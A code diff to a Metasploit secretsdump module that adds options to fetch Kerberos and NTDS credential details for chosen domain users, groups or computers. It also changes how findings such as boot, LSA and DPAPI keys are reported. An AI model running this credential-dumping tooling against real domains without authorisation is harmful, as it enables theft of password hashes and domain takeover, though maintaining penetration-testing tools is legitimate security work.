@@ -63,7 +63,8 @@ class MetasploitModule < Msf::Auxiliary
         'Author' => [
           'Alberto Solino', # Original Impacket code
           'Christophe De La Fuente', # MSF module
-          'antuache' # Inline technique
+          'antuache', # Inline technique
+          'smashery' # Querying subset of domain accounts
         ],
         'References' => [
           ['URL', 'https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py'],
@@ -91,7 +92,9 @@ class MetasploitModule < Msf::Auxiliary
           'INLINE',
           [ true, 'Use inline technique to read protected keys from the registry remotely without saving the hives to disk', true ],
           conditions: ['ACTION', 'in', %w[ALL SAM CACHE LSA]]
-        )
+        ),
+        OptEnum.new('KRB_TYPES', [true, 'Which type of accounts to retrieve kerberos details for', 'ALL', ['ALL', 'USERS_ONLY', 'COMPUTERS_ONLY']], conditions: ['ACTION', 'in', %w[ALL DOMAIN]]),
+        OptString.new('KRB_USERS', [false, 'Comma-separated list of user accounts or groups to retrieve kerberos details for', ''], conditions: ['ACTION', 'in', %w[ALL DOMAIN]])
       ]
     )
 
@@ -262,7 +265,7 @@ class MetasploitModule < Msf::Auxiliary
       next unless !users[rid][:UserPasswordHint].nil? && !users[rid][:UserPasswordHint].empty?
 
       hint = "#{users[rid][:Name]}: \"#{users[rid][:UserPasswordHint]}\""
-      report_info(hint, 'user.password_hint')
+      report_info({ password_hint: hint }, 'user.password_hint')
       print_line(hint)
       hint_count += 1
     end
@@ -325,27 +328,27 @@ class MetasploitModule < Msf::Auxiliary
 
       username = cache_info.data.username.encode(::Encoding::UTF_8)
       info = []
-      info << ("Username: #{username}")
+      info << "Username: #{username}"
       if cache_info.iteration_count
-        info << ("Iteration count: #{cache_info.iteration_count} -> real #{cache_info.real_iteration_count}")
+        info << "Iteration count: #{cache_info.iteration_count} -> real #{cache_info.real_iteration_count}"
       end
-      info << ("Last login: #{cache_info.entry.last_access.to_time}")
+      info << "Last login: #{cache_info.entry.last_access.to_time}"
       dns_domain_name = cache_info.data.dns_domain_name.encode(::Encoding::UTF_8)
-      info << ("DNS Domain Name: #{dns_domain_name}")
-      info << ("UPN: #{cache_info.data.upn.encode(::Encoding::UTF_8)}")
-      info << ("Effective Name: #{cache_info.data.effective_name.encode(::Encoding::UTF_8)}")
-      info << ("Full Name: #{cache_info.data.full_name.encode(::Encoding::UTF_8)}")
-      info << ("Logon Script: #{cache_info.data.logon_script.encode(::Encoding::UTF_8)}")
-      info << ("Profile Path: #{cache_info.data.profile_path.encode(::Encoding::UTF_8)}")
-      info << ("Home Directory: #{cache_info.data.home_directory.encode(::Encoding::UTF_8)}")
-      info << ("Home Directory Drive: #{cache_info.data.home_directory_drive.encode(::Encoding::UTF_8)}")
-      info << ("User ID: #{cache_info.entry.user_id}")
-      info << ("Primary Group ID: #{cache_info.entry.primary_group_id}")
-      info << ("Additional groups: #{cache_info.data.groups.map(&:relative_id).join(' ')}")
+      info << "DNS Domain Name: #{dns_domain_name}"
+      info << "UPN: #{cache_info.data.upn.encode(::Encoding::UTF_8)}"
+      info << "Effective Name: #{cache_info.data.effective_name.encode(::Encoding::UTF_8)}"
+      info << "Full Name: #{cache_info.data.full_name.encode(::Encoding::UTF_8)}"
+      info << "Logon Script: #{cache_info.data.logon_script.encode(::Encoding::UTF_8)}"
+      info << "Profile Path: #{cache_info.data.profile_path.encode(::Encoding::UTF_8)}"
+      info << "Home Directory: #{cache_info.data.home_directory.encode(::Encoding::UTF_8)}"
+      info << "Home Directory Drive: #{cache_info.data.home_directory_drive.encode(::Encoding::UTF_8)}"
+      info << "User ID: #{cache_info.entry.user_id}"
+      info << "Primary Group ID: #{cache_info.entry.primary_group_id}"
+      info << "Additional groups: #{cache_info.data.groups.map(&:relative_id).join(' ')}"
       logon_domain_name = cache_info.data.logon_domain_name.encode(::Encoding::UTF_8)
-      info << ("Logon domain name: #{logon_domain_name}")
+      info << "Logon domain name: #{logon_domain_name}"
 
-      report_info(info.join('; '), 'user.cache_info')
+      report_info({ info: info.join('; ') }, 'user.cache_info')
       vprint_line(info.join("\n"))
 
       credential_opts = {
@@ -508,8 +511,8 @@ class MetasploitModule < Msf::Auxiliary
       # Decode the DPAPI Secrets
       machine_key = secret_item[4, 20]
       user_key = secret_item[24, 20]
-      report_info(machine_key.unpack('H*')[0], 'dpapi.machine_key')
-      report_info(user_key.unpack('H*')[0], 'dpapi.user_key')
+      report_info({ machine_key: machine_key.unpack('H*')[0] }, 'dpapi.machine_key')
+      report_info({ user_key: user_key.unpack('H*')[0] }, 'dpapi.user_key')
       secret = "dpapi_machinekey: 0x#{machine_key.unpack('H*')[0]}\ndpapi_userkey: 0x#{user_key.unpack('H*')[0]}"
     elsif upper_name.start_with?('$MACHINE.ACC')
       md4 = OpenSSL::Digest::MD4.digest(secret_item)
@@ -609,13 +612,21 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def get_domain_users
-    users = @samr.samr_enumerate_users_in_domain(domain_handle: @domain_handle)
+    user_uac = RubySMB::Dcerpc::Samr::USER_NORMAL_ACCOUNT
+    computer_uac = RubySMB::Dcerpc::Samr::USER_WORKSTATION_TRUST_ACCOUNT | RubySMB::Dcerpc::Samr::USER_SERVER_TRUST_ACCOUNT | RubySMB::Dcerpc::Samr::USER_INTERDOMAIN_TRUST_ACCOUNT
+    all_uac = user_uac | computer_uac
+    uac = {
+      'ALL' => all_uac,
+      'USERS_ONLY' => user_uac,
+      'COMPUTERS_ONLY' => computer_uac
+    }[datastore['KRB_TYPES']]
+    users = @samr.samr_enumerate_users_in_domain(domain_handle: @domain_handle, user_account_control: uac)
     vprint_status("Obtained #{users.length} domain users, fetching the SID for each...")
     progress_interval = 250
     nb_digits = (Math.log10(users.length) + 1).floor
     users = users.each_with_index.map do |(rid, name), index|
       if index % progress_interval == 0
-        percent = format('%.2f', (index / users.length.to_f * 100)).rjust(5)
+        percent = format('%.2f', index / users.length.to_f * 100).rjust(5)
         print_status("SID enumeration progress - #{index.to_s.rjust(nb_digits)} / #{users.length} (#{percent}%)")
       end
       sid = @samr.samr_rid_to_sid(object_handle: @domain_handle, rid: rid)
@@ -830,6 +841,40 @@ class MetasploitModule < Msf::Auxiliary
     result
   end
 
+  def get_domain_users_by_name(names)
+    details = @samr.samr_lookup_names_in_domain(
+      domain_handle: @domain_handle,
+      names: names
+    )
+    raise Msf::Exploit::Remote::MsSamr::MsSamrNotFoundError, 'One or more of the provided names was not found.' if details.nil?
+
+    result = []
+    names.each do |name|
+      user_details = details[name]
+      case user_details[:use]
+      when 1 # SidTypeUser
+        sid = @samr.samr_rid_to_sid(
+          object_handle: @domain_handle,
+          rid: user_details[:rid]
+        ).to_s
+        result.append([sid, name])
+      when 2 # SidTypeGroup
+        handle = @samr.samr_open_group(domain_handle: @domain_handle, group_id: user_details[:rid])
+        results = @samr.samr_get_members_in_group(group_handle: handle)
+        results.each do |entry|
+          member_rid = entry[0]
+          sid = @samr.samr_rid_to_sid(
+            object_handle: @domain_handle,
+            rid: member_rid
+          ).to_s
+          result.append([sid, ''])
+        end
+      end
+    end
+
+    result
+  end
+
   def dump_ntds_hashes
     _machine_name, domain_name, dns_domain_name = get_machine_name_and_domain_info
     return unless domain_name
@@ -846,7 +891,19 @@ class MetasploitModule < Msf::Auxiliary
       )
       return
     end
-    users = get_domain_users
+    specific_users = datastore['KRB_USERS'].strip.split(',').map(&:strip)
+
+    if specific_users.empty?
+      users = get_domain_users
+    else
+      if datastore['KRB_TYPES'] != 'ALL'
+        print_warning("Searching for specific users/groups; KRB_TYPES setting (#{datastore['KRB_TYPES']}) will be ignored")
+      end
+
+      users = get_domain_users_by_name(specific_users)
+    end
+
+    sids = Set.new(users.map { |sid_and_user| sid_and_user[0] })
 
     dcerpc_client = connect_drs
     unless dcerpc_client
@@ -859,29 +916,27 @@ class MetasploitModule < Msf::Auxiliary
     ph_drs = dcerpc_client.drs_bind
     dc_infos = dcerpc_client.drs_domain_controller_info(ph_drs, domain_name)
     user_info = {}
-    dc_infos.each do |dc_info|
-      users.each do |user|
-        sid = user[0]
-        crack_names = dcerpc_client.drs_crack_names(ph_drs, rp_names: [sid])
-        crack_names.each do |crack_name|
-          user_record = dcerpc_client.drs_get_nc_changes(
-            ph_drs,
-            nc_guid: crack_name.p_name.to_s.encode('utf-8'),
-            dsa_object_guid: dc_info.ntds_dsa_object_guid
-          )
-          user_info[sid] = parse_user_record(dcerpc_client, user_record)
-        end
+    dc_info = dc_infos[0]
+    sids.each do |sid|
+      crack_names = dcerpc_client.drs_crack_names(ph_drs, rp_names: [sid])
+      crack_names.each do |crack_name|
+        user_record = dcerpc_client.drs_get_nc_changes(
+          ph_drs,
+          nc_guid: crack_name.p_name.to_s.encode('utf-8'),
+          dsa_object_guid: dc_info.ntds_dsa_object_guid
+        )
+        user_info[sid] = parse_user_record(dcerpc_client, user_record)
+      end
 
-        groups = get_user_groups(sid)
-        groups.each do |group|
-          case group.name
-          when 'BUILTIN\\Administrators'
-            user_info[sid][:admin] = true
-          when '(domain)\\Domain Admins'
-            user_info[sid][:domain_admin] = true
-          when '(domain)\\Enterprise Admins'
-            user_info[sid][:enterprise_admin] = true
-          end
+      groups = get_user_groups(sid)
+      groups.each do |group|
+        case group.name
+        when 'BUILTIN\\Administrators'
+          user_info[sid][:admin] = true
+        when '(domain)\\Domain Admins'
+          user_info[sid][:domain_admin] = true
+        when '(domain)\\Enterprise Admins'
+          user_info[sid][:enterprise_admin] = true
         end
       end
     end
@@ -922,7 +977,7 @@ class MetasploitModule < Msf::Auxiliary
       extra_info << "IsDomainAdmin=#{info[:domain_admin]},"
       extra_info << "IsEnterpriseAdmin=#{info[:enterprise_admin]}"
       print_line(pwdump + extra_info + '::')
-      report_info("#{full_name} (#{sid}): #{extra_info}", 'user.info')
+      report_info({ fullname: full_name, sid: sid, extra_info: extra_info }, 'user.info')
     end
 
     print_line("\n# Account Info:")
@@ -1058,8 +1113,7 @@ class MetasploitModule < Msf::Auxiliary
 
     if session
       print_status("Using existing session #{session.sid}")
-      client = session.client
-      self.simple = ::Rex::Proto::SMB::SimpleClient.new(client.dispatcher.tcp_socket, client: client)
+      self.simple = session.simple_client
       simple.connect("\\\\#{simple.address}\\IPC$") # smb_login connects to this share for some reason and it doesn't work unless we do too
     else
       connect
@@ -1140,7 +1194,7 @@ class MetasploitModule < Msf::Auxiliary
                     'try DOMAIN action since it does not need BootKey')
         end
       end
-      report_info(boot_key.unpack('H*')[0], 'host.boot_key')
+      report_info({ boot_key: boot_key.unpack('H*')[0] }, 'host.boot_key')
     end
 
     check_lm_hash_not_stored if @winreg
@@ -1187,7 +1241,7 @@ class MetasploitModule < Msf::Auxiliary
               print_warning('This might be expected or you can still try again with the `INLINE` option set to false')
             end
           else
-            report_info(lsa_key.unpack('H*')[0], 'host.lsa_key')
+            report_info({ lsa_key: lsa_key.unpack('H*')[0] }, 'host.lsa_key')
             if ['ALL', 'LSA'].include?(action.name)
               dump_lsa_secrets(windows_reg, lsa_key)
             end
@@ -1199,7 +1253,7 @@ class MetasploitModule < Msf::Auxiliary
                   print_warning('This might be expected or you can still try again with the `INLINE` option set to false')
                 end
               else
-                report_info(nlkm_key.unpack('H*')[0], 'host.nlkm_key')
+                report_info({ nlkm_key: nlkm_key.unpack('H*')[0] }, 'host.nlkm_key')
                 dump_cached_hashes(windows_reg, nlkm_key)
               end
             end
@@ -1219,6 +1273,8 @@ class MetasploitModule < Msf::Auxiliary
     fail_with(Module::Failure::UnexpectedReply, "[#{e.class}] #{e}")
   rescue Rex::ConnectionError => e
     fail_with(Module::Failure::Unreachable, "[#{e.class}] #{e}")
+  rescue Msf::Exploit::Remote::MsSamr::MsSamrError => e
+    fail_with(Module::Failure::BadConfig, "[#{e.class}] #{e}")
   rescue ::StandardError => e
     do_cleanup
     raise e
